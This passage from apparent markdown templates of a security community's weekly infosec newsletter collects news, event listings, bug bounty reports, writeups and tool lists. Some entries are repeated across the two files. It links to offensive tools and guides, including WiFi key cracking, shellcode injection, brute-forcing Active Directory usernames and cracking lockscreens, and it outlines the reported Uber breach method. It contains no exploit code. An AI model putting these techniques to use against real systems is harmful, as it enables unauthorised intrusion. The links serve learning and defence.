\n\n3. Top Infosec News\n \n\n - 🟢 **Announcement** : \n - [Active Directory integration features in Ubuntu 22.04](https://ubuntu.com/engage/New-Active-Directory-integration-features) \n - Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero day vulnerabilty.\n - Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks. \n - 🟢 TikTok still denies security breach of 2 billions users information after hackers leak user data, source code. \n - 🟢 Rockstar Games Confirms Hacker Stole Early Grand Theft 6 and Uber also confirm that their data has been leaked by Laplus$ group.\n - 🟢 [Europol and Bitdefender Release Free Decryptor for LockerGoga Ransomware](https://www.nomoreransom.org/uploads/LockerGoga-Decrypt-Doc.pdf)\n - 🟢 [Microsoft Teams stores auth tokens as cleartext in Windows, Linux, Macs](https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/), by bleepingcomputer.\n
\n \n
\n\n4. Event Recap\n\n \nThis Week THREATCON 2022 Conferences and Null Delhi meetup registration was mainly trending on twitter and We have collected public available important Talk, Slides, Tools, Podcast, Videos, upcomming events related to conferences, talks & webinars so you don't miss it and watch them, at a time that suits you.\n\n - **Conferences**\n - At THREAT CON SEP 2022, Akshay & bharath shared their talk [FRida Unleashed - Scratching beneath the surface of bug bounties](https://speakerdeck.com/0xbharath/frida-unleashed-scratching-beneath-the-surface-of-bug-bounties)\n\n - **Webinars and videos**\n - Null Delhi September Meetup is scheduled for 24 Sep 2022 at @esecforte office in Gurugram. you can [Register here](https://null.community/events/844-delhi-monthly-meetup)\n - For Red Team, This is really a awsome video but you have you watch it with subtitle where @lsecqt demonstrated a [walkthrough for Sliver C2 is brand new (and still in development) Command and Control Framework](https://www.youtube.com/watch?v=QO_1UMaiWHk). It has only CLI version (for now) and is designed to be extremely easy to install and to work with.\n\n - **Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎**: \n \n - MSSP Alert Live : 19th-21st September | Washington DC\n - CSO50 : 19th-21st September | Washington DC \n - Fal.Con 2022 : 19th-21st September | Las Vegas \n - Texas Cyber Summit 2022 : 22nd-24th September | Austin\n - BSides Singapore Conference 2022 : 22nd-23rd September\n - InfoSec World 2022 : 26th-28th September | Orlando \n \n - 9th Annual Control Systems Cybersecurity : 29th September | UK\n - BruCON : 29th to 30th September | Mechelen, BE \n - NetDiligence Cyber Risk Summit : 10th-12th October | Santa Monica\n - Cyber Security World : 12th to 13th October | Singapore, SG \n - CISO visions : 17th to 21st October | Virtual – English \n - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October | Washington DC \n - E-crime & Cybersecurity London : 19th October | London, UK \n - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland \n - IT-SA : 25th to 27th October | Nuremberg, DE \n\n
\n \n
\n\n5. Hiring/Jobs\n\n \nIn this Beginners friendly segment, we talk about and share latest resources related to Jobs in this month, interview questions and free trainning offered by organization, community and leader.\n \n - 1. Take a Look at [Internship/Job Opening in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker have collected [Interview Questions asked by organization](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n
\n
\n\n\n
\n 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞 \n\n
\n 1. Hackerone/Bugcrowd reports for Bug Hunters. \n \n *1. In This Segment, We have filtered out Top **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n - 🐞$4,000 - [SSRF in Functional Administrative Support Tool pdf generator (████)](https://hackerone.com/reports/1628209) in U.S. Dept Of Defense.\n - 🐞$2,400 - [Airflow Daemon Mode Insecure Umask Privilege Escalation](https://hackerone.com/reports/1690093) in Apache Airflow prior to 2.3.4.\n - 🐞$2,000 - [Remote Code Execution on https://███ via improper access control to SCORM Zip upload/import](https://hackerone.com/reports/1122791) in U.S. Dept Of Defense.\n - 🐞[STORED XSS in █████████/nlc/login.aspx via \"edit\" GET parameter through markdown editor](https://hackerone.com/reports/1631447) in U.S. Dept Of Defense.\n
\n \n
\n2. Bug bounty writeups, tips & resources. \n \n *2. In This Beginners friendly segment, We collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n - @Mohsinkhan answered a question for new bug hunters through article [What would I do if I start bug hunting from 0 again?](https://mokhansec.medium.com/what-would-i-do-if-i-start-bug-hunting-from-0-again-79c7fa78b789)\n - In this article, @AkashVenky talked about [Network Segmentation Pentesting](https://akash-venky091.medium.com/network-segmentation-pentesting-97238d63b001) and How it could be used to validate that less-secure networks.\n \n - @302Found, releases the [PART 2 of Cool Recon techniques every hacker misses!🔥](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-episode-2-8024e8338756) and incase you have not read the [PART 1](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89)\n \n - @zer0d shared a writeup explaining [How he found 3 vulnerability in a day?](https://infosecwriteups.com/how-i-found-3-bug-bounties-in-a-day-c82fe023716e) and the 3 vulnerabilites was Bypassed one-time usage on the sign-in link, The credit card checker bypass, E-mail bombing and Rate limit.\n \n - @OmarHashem shared a story on How he [abused the file upload function to get a high severity vulnerability in Bug Bounty](https://infosecwriteups.com/how-i-abused-the-file-upload-function-to-get-a-high-severity-vulnerability-in-bug-bounty-7cdcf349080b)\n \n - Bug hunter @viruszzwarning observed that most of the websites are having a specific type of vulnerability, i.e. directory listing and this is [leaking their clients identification details, like Aadhaar card, PAN card, Bank details and many more…](https://viruszzwarning.medium.com/aadhaar-pan-info-leak-4189b6057cd4)\n \n - Few motnths back I shared a video for Bun(new open source runtime environment created by Jared Sumner and over 40 contributors.) where developers are predicting [Bun - an incredibly fast all-in-one JavaScript runtime going to Replece NodeJs](https://medium.com/@appiahyoofi/goodbye-node-js-9e2f71f5e430). As bug hunters you should keep an eye on this.\n \n
\n\nLast week, @intigri asked community about Pickup line for Bug Hunter and one of my favourite was\n- You're like a P1: special and hard to find.\n\n
\n\n\n
\n 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\nCommunity members test the tools and we filter out most demanding and every week We filter out helpful tools that satisfy the hacker Purpose in different domains.\n\n
\n1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools\n \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n \n - [CATS](https://github.com/Endava/cats) -> REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints, by Endava and a detailed tutorials on [how to use CATS](https://www.kitploit.com/2022/09/cats-rest-api-fuzzer-and-negative.html) by kitploit.\n - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLI Tester for HTTP Headers, by [Kun](https://twitter.com/root_tanishq)\n - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information Gathering Automation Tool.\n - [Darc - Darkweb Crawler Project.](https://github.com/JarryShaw/darc) -> darc is designed as a swiss army knife for darkweb crawling.It integrates requests to collect HTTP request and response information, such as cookies, header fields, etc. It also bundles selenium to provide a fully rendered web page and screenshot of such view.\n - [requests-ip-rotator]https://github.com/Ge0rg3/requests-ip-rotator) -> A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing. \n
\n\n
\n2. Cloud Security - 3 Tools \n \n - **2. Cloud Security** - 3\n - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n
\n\n
\n3. Blue/Red/Purple Team, IR and Threat intelligence - 5 Tools \n \n - **3. Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) -> varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n - [Codecepticon](https://github.com/Accenture/Codecepticon) -> An offensive security obfuscator for C#, VBA, and PowerShell.\n - [LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed](https://github.com/lkarlslund/ldapnomnom),which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speeds.\n - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n - [Elixir Secure Coding Training (ESCT)](https://github.com/Podium/elixir-secure-coding) - An interactive cybersecurity curriculum designed for enterprise use.\n
\n\n
\n4. Reverse Engineering & OSINT - 3 Tools \n \n - **4. Reverse Engineering & OSINT Tools** - 3\n - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. Its objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.\n - [uosint](https://github.com/uosint-project/uosint) -> Find The Profiles Of A Person On Social Networks. \n - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once. \n\n
\n\n
\n5. IoT, OS & Hardware - 3 \n \n - **5. IoT, OS & Hardware** - 3\n \n - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n
\n
\n \n ---\n##### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n \n If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ??\n Thanks for reading!\n\n" }, { "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_Trail_For_Professionals.md", "content": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Things Take Time.\"\n Here are the Agenda for *Weekly infosec Update v0.5* : **21st-27th September 2022**\n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n\n**Tips to SAVE TIME & How to READ this Newsletter? 👇**\n- Select the topic from the *Navbar* bellow and click on **Preview** and **Arrow (>)** to see the Details:\n- Open all relevant Title in New Tab (Ctrl+Click) then READ it one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n\nHuge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n\n
\n\n - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n
\n \n---\n\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [21st September - 27th September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\nThere are tens of thousands of vulnerabilities disclosed each Week. Only a handful of them will ever be exploited So In this Section, Every Week we filter out [Security that has been Patched within a Week, CVE: ANALYSIS & POC that have critical or Higher Severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md). Click on link to see all the mentioned Patches, poc, analysis and 0-day exploit.\n\n
\nPreview\n\n \n Security Patched : Latest IT security vulnerability patched within this week on selected company such as Apple, Google, \n Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc. \n \n CVE:ANALYSIS & POC: CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps. \n \n \n CVE POC : cve-2022-32548 RCE, cve-2022-2588, cve-2022-34721, cve-2022-36804, cve-2022-34709, cve-2022-33980, \n cve-2019-2215 & GwisinMsi poc based on recreating an MSI Payload for Fun and no profit blog. \n \n\n
\n\n--- \n\n\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n In this Segment, we collect amazing things from all over the infosec domain for Researcher and professionals those who want to explore Security, looking for the new approach to find vulnerability, want to track of Infosec market and startups. \n
\n1 - Infosec Business, funded and Market \n \n - **1 - Infosec Business, funded and Market** \n \n - [CISA Strategic plan report for year 2023 - 2025](https://drive.google.com/file/d/1-vQYIJ7sZrn_PAxpO3W0ytX2-Oc2eXoB/view?usp=sharing)\n - [Why do security products fail?](https://my.rage.cloud/why-do-security-products-fail-7477dd0ec878) \n \n - InfoSec Market\n - [Understand the Indian Market, client and understand who is right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n - [Cybersecurity Funding Review for August 2022](https://www.returnonsecurity.com/cybersecurity-funding-review-august-2022/?utm_source=securityfundednewsletter) , by Mike p.\n - [Global Automotive Cybersecurity Market to Reach $5.3 Billion by 2026](https://www.prnewswire.com/news-releases/global-automotive-cybersecurity-market-to-reach-5-3-billion-by-2026--301622955.html?utm_source=securityfundednewsletter)\n \n
\n \n
\n 2 - Web Security and android security, 3 - Cloud Security, 4 - Blue/Red/Threat Intelligence Team\n \n - **1 - Web Security and android security**\n - [CompTIA Pentest + Certification review after 2nd attempt](https://notes.n3m3515.space/pentest/comptia-pentest-002-notes) by Inside \n - [How to avoid data breaches with GraphQL?](https://blog.escape.tech/data-leaks/), by Sophie Boulaaouli\n - A security expert's [guide on scanning unpatched wordpress blogs](https://blog.criminalip.io/2022/09/13/wordpress-vulnerability/)\n - A report by WPSCAN.COM, where they have demonstared [HOW TO:FIND WORDPRESS PLUGIN VULNS](https://drive.google.com/file/d/1DlzXw2iNvLXzm-it5G6nwENnL0v7zcrk/view?usp=sharing)\n - @hakluke & @pry0cc wrote a blog for projectdiscovery [Guide to DNS takeovers 😊](https://blog.projectdiscovery.io/guide-to-dns-takeovers/)\n - Tamir describes in this article how he found CVE-2021-1961, [Attacking the Android kernel using the Qualcomm TrustZone](https://tamirzb.com/attacking-android-kernel-using-qualcomm-trustzone) where Android kernel exploit utilizes the TrustZone in order to compromise the kernel. \n \n - **2 - Cloud Security**\n - [Azure Threat Research Matrix](https://microsoft.github.io/Azure-Threat-Research-Matrix/) -> The purpose of this is to conceptualize the known TTP that adversaries may use against Azure.\n - [Incident response in AWS CloudTrail](https://www.chrisfarris.com/post/aws-ir/)\n - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n \n- **3 - Blue/Red/Purple/Threat Intelligence Team**\n - **Blue Team**\n - Practical Guidance for [IT Admins to respond after Ransomware attacks](https://m365internals.com/2022/09/19/practical-guidance-for-it-admins-to-respond-to-ransomware-attacks/)\n - [How to kick off an incident response investigation for a compromised SaaS account](https://pushsecurity.com/blog/how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas/), by Johann Scheepers.\n - [Data-Centric Security: Threat Hunting based on Zipf’s Law](https://ditrizna.medium.com/data-centric-security-threat-hunting-based-on-zipfs-law-50ad919fc135)\n - [Cross-Layer Security: A Holistic View of Internet Security](https://freedom-to-tinker.com/2022/09/20/cross-layer-security-a-holistic-view-of-internet-security/), by Henry Birge-Lee, Liang Wang, Grace Cimaszewski, Jennifer Rexford and Prateek Mittal.\n - [The Evolution of the Chromeloader Malware](https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html)\n - [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n - [Efficient Proofs of Software Exploitability for Real-world Processors](https://eprint.iacr.org/2022/1223)\n \n - **Red Team**\n - [Windows Kernel Exploitation instruction](https://hackmd.io/@truebad0ur/WindowsKernelExploiting) and [Assembled HEVD driver and loader](https://drive.google.com/file/d/19NmwL88KmiOAcRlodNCB-m9oNxC31But/view?usp=sharing)\n - How to [crack the WEP key using only one data packet and a wordlist, and then use the wireshark tool to decode the data packet](https://tbhaxor.com/decrypt-wep-traffic-with-insufficient-ivs/)\n - How to [crack the key of a WEP-encrypted WiFi network](https://tbhaxor.com/pivot-through-protected-wifi-network/) and pivot into it to interact with vulnerable services running on it.\n - How to [capture the 2 out of 4 EAPOL handshakes of WPA network](https://tbhaxor.com/cracking-wpa-psk-using-aircrack/) and crack the password from a wordlist. \n - How to [set up a honey pot access point with hostapd and capture the EAPOL handshake from a probing client to brute force the pre-shared key.](https://tbhaxor.com/crack-wpa-psk-from-probing-clients-without-access-point/)\n - [Shellcode Injection in C# - Part 3](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-3/) - using API call QueueUserAPC, By Ahmed Sher.\n \n
\n\n---\n\n## Beginners-Friendly \n\n
\n\n📰📰📰 Community Infused NEWS 📰📰📰 \n\n
\n 1. Twiter Threads & Tips\n \n \n - 🟢 [LockBit ransomware group pays its first ever $50k bug bounty](https://twitter.com/ido_cohen2/status/1571039567666638848)\n - 🟢 On 12th Sept 2022 [idclickthat](https://twitter.com/idclickthat) tweeted about [Malware @Zoom downloads](https://twitter.com/idclickthat/status/1569350142230204421?t=_7lpBg7U-iokSMCGtSXZSw&s=19) On 19th Sept, Cyble Research and Intelligence Labs (CRIL) released a blog about @idclickthat tweet investigation and It turn out [New Malware Campaign Targets Zoom Users](https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/)\n - 🟢 @SamCurry received [2 crore from Google because of human error.😅](https://twitter.com/samwcyo/status/1569897392560050178?t=TROhjl9xQpcHnG3UOv_uow&s=19)\n - 🟢 [William Wallace](https://twitter.com/phyr3wall/) released his 1st youtube video on DNS Zone Takeovers](https://www.youtube.com/watch?v=DLNjP9KSgzA&feature=youtu.be)\n
\n \n
\n\n2. Data Breach & BlackHat Hackers Leaked\n \n \n - 🔴 **News - Paid Tools** that has been leaked or cracked by Black Hat Hackers : Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1,Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **News - Black Hat Hacker leaked** : GTA 6 has been leaked over onion browser, Conti source code for v3.7.7 and Taurus bot source code has been leaked. \n \n - 🔴 \"UBER GOT HACKED\". After few days Uber officially recorgnized the Data Breach and mentioned that Laplus$ group was behind the attack but Hacker group VX underground and indivisuals such as ColtonSeal, Kevin shared multiple SS where hacker claimed and mocked the security of Uber and shared the Unconfirmed method of breach:\n - Socially engineer an employee to get on their VPN (could have been prevented with webauthn / hardware 2fa)\n - Once on VPN, scan their intranet and find a network share \n - Network share has powershell scripts contained the username and password for a admin user in Thycotic (PAM) Using this hacker was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite\", domain admin, AWS instance, HackerOne administration panel, and more.\n - From there can get full access to all systems.\n - When the individual breached Uber, they sent a slack notification to everyone informing them the company had been breached.Employees thought it was a joke.\n
\n \n
\n\n3. Top Infosec News\n \n\n - 🟢 **Announcement** : \n - [Active Directory integration features in Ubuntu 22.04](https://ubuntu.com/engage/New-Active-Directory-integration-features) \n - Apple has released another round of security updates to address multiple vulnerabilities in iOS and macOS, including a new zero day vulnerabilty.\n - Microsoft on Tuesday shipped fixes to quash 64 new security flaws across its software lineup, including one zero-day flaw that has been actively exploited in real-world attacks. \n - 🟢 TikTok still denies security breach of 2 billions users information after hackers leak user data, source code. \n - 🟢 Rockstar Games Confirms Hacker Stole Early Grand Theft 6 and Uber also confirm that their data has been leaked by Laplus$ group.\n - 🟢 [Europol and Bitdefender Release Free Decryptor for LockerGoga Ransomware](https://www.nomoreransom.org/uploads/LockerGoga-Decrypt-Doc.pdf)\n - 🟢 [Microsoft Teams stores auth tokens as cleartext in Windows, Linux, Macs](https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/), by bleepingcomputer.\n
\n \n
\n\n4. Event Recap\n\n \nThis Week THREATCON 2022 Conferences and Null Delhi meetup registration was mainly trending on twitter and We have collected public available important Talk, Slides, Tools, Podcast, Videos, upcomming events related to conferences, talks & webinars so you don't miss it and watch them, at a time that suits you.\n\n - **Conferences**\n - At THREAT CON SEP 2022, Akshay & bharath shared their talk [FRida Unleashed - Scratching beneath the surface of bug bounties](https://speakerdeck.com/0xbharath/frida-unleashed-scratching-beneath-the-surface-of-bug-bounties)\n\n - **Webinars and videos**\n - Null Delhi September Meetup is scheduled for 24 Sep 2022 at @esecforte office in Gurugram. you can [Register here](https://null.community/events/844-delhi-monthly-meetup)\n - For Red Team, This is really a awsome video but you have you watch it with subtitle where @lsecqt demonstrated a [walkthrough for Sliver C2 is brand new (and still in development) Command and Control Framework](https://www.youtube.com/watch?v=QO_1UMaiWHk). It has only CLI version (for now) and is designed to be extremely easy to install and to work with.\n\n - **Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎**: \n \n - MSSP Alert Live : 19th-21st September | Washington DC\n - CSO50 : 19th-21st September | Washington DC \n - Fal.Con 2022 : 19th-21st September | Las Vegas \n - Texas Cyber Summit 2022 : 22nd-24th September | Austin\n - BSides Singapore Conference 2022 : 22nd-23rd September\n - InfoSec World 2022 : 26th-28th September | Orlando \n \n - 9th Annual Control Systems Cybersecurity : 29th September | UK\n - BruCON : 29th to 30th September | Mechelen, BE \n - NetDiligence Cyber Risk Summit : 10th-12th October | Santa Monica\n - Cyber Security World : 12th to 13th October | Singapore, SG \n - CISO visions : 17th to 21st October | Virtual – English \n - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October | Washington DC \n - E-crime & Cybersecurity London : 19th October | London, UK \n - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland \n - IT-SA : 25th to 27th October | Nuremberg, DE \n\n
\n \n
\n\n5. Hiring/Jobs\n\n \nIn this Beginners friendly segment, we talk about and share latest resources related to Jobs in this month, interview questions and free trainning offered by organization, community and leader.\n \n - 1. Take a Look at [Internship/Job Opening in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker have collected [Interview Questions asked by organization](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n
\n
\n\n\n
\n 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞 \n\n
\n 1. Hackerone/Bugcrowd reports for Bug Hunters. \n \n *1. In This Segment, We have filtered out Top **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n - 🐞$4,000 - [SSRF in Functional Administrative Support Tool pdf generator (████)](https://hackerone.com/reports/1628209) in U.S. Dept Of Defense.\n - 🐞$2,400 - [Airflow Daemon Mode Insecure Umask Privilege Escalation](https://hackerone.com/reports/1690093) in Apache Airflow prior to 2.3.4.\n - 🐞$2,000 - [Remote Code Execution on https://███ via improper access control to SCORM Zip upload/import](https://hackerone.com/reports/1122791) in U.S. Dept Of Defense.\n - 🐞[STORED XSS in █████████/nlc/login.aspx via \"edit\" GET parameter through markdown editor](https://hackerone.com/reports/1631447) in U.S. Dept Of Defense.\n
\n \n
\n2. Bug bounty writeups, tips & resources. \n \n *2. In This Beginners friendly segment, We collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n - @Mohsinkhan answered a question for new bug hunters through article [What would I do if I start bug hunting from 0 again?](https://mokhansec.medium.com/what-would-i-do-if-i-start-bug-hunting-from-0-again-79c7fa78b789)\n - In this article, @AkashVenky talked about [Network Segmentation Pentesting](https://akash-venky091.medium.com/network-segmentation-pentesting-97238d63b001) and How it could be used to validate that less-secure networks.\n \n - @302Found, releases the [PART 2 of Cool Recon techniques every hacker misses!🔥](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-episode-2-8024e8338756) and incase you have not read the [PART 1](https://infosecwriteups.com/cool-recon-techniques-every-hacker-misses-1c5e0e294e89)\n \n - @zer0d shared a writeup explaining [How he found 3 vulnerability in a day?](https://infosecwriteups.com/how-i-found-3-bug-bounties-in-a-day-c82fe023716e) and the 3 vulnerabilites was Bypassed one-time usage on the sign-in link, The credit card checker bypass, E-mail bombing and Rate limit.\n \n - @OmarHashem shared a story on How he [abused the file upload function to get a high severity vulnerability in Bug Bounty](https://infosecwriteups.com/how-i-abused-the-file-upload-function-to-get-a-high-severity-vulnerability-in-bug-bounty-7cdcf349080b)\n \n - Bug hunter @viruszzwarning observed that most of the websites are having a specific type of vulnerability, i.e. directory listing and this is [leaking their clients identification details, like Aadhaar card, PAN card, Bank details and many more…](https://viruszzwarning.medium.com/aadhaar-pan-info-leak-4189b6057cd4)\n \n - Few motnths back I shared a video for Bun(new open source runtime environment created by Jared Sumner and over 40 contributors.) where developers are predicting [Bun - an incredibly fast all-in-one JavaScript runtime going to Replece NodeJs](https://medium.com/@appiahyoofi/goodbye-node-js-9e2f71f5e430). As bug hunters you should keep an eye on this.\n \n
\n\nLast week, @intigri asked community about Pickup line for Bug Hunter and one of my favourite was\n- You're like a P1: special and hard to find.\n\n
\n\n\n
\n 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\nCommunity members test the tools and we filter out most demanding and every week We filter out helpful tools that satisfy the hacker Purpose in different domains.\n\n
\n1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools\n \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n \n - [CATS](https://github.com/Endava/cats) -> REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints, by Endava and a detailed tutorials on [how to use CATS](https://www.kitploit.com/2022/09/cats-rest-api-fuzzer-and-negative.html) by kitploit.\n - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLI Tester for HTTP Headers, by [Kun](https://twitter.com/root_tanishq)\n - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information Gathering Automation Tool.\n - [Darc - Darkweb Crawler Project.](https://github.com/JarryShaw/darc) -> darc is designed as a swiss army knife for darkweb crawling.It integrates requests to collect HTTP request and response information, such as cookies, header fields, etc. It also bundles selenium to provide a fully rendered web page and screenshot of such view.\n - [requests-ip-rotator]https://github.com/Ge0rg3/requests-ip-rotator) -> A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing. \n
\n\n
\n2. Cloud Security - 3 Tools \n \n - **2. Cloud Security** - 3\n - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n
\n\n
\n3. Blue/Red/Purple Team, IR and Threat intelligence - 5 Tools \n \n - **3. Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) -> varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n - [Codecepticon](https://github.com/Accenture/Codecepticon) -> An offensive security obfuscator for C#, VBA, and PowerShell.\n - [LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed](https://github.com/lkarlslund/ldapnomnom),which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speeds.\n - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n - [Elixir Secure Coding Training (ESCT)](https://github.com/Podium/elixir-secure-coding) - An interactive cybersecurity curriculum designed for enterprise use.\n
\n\n
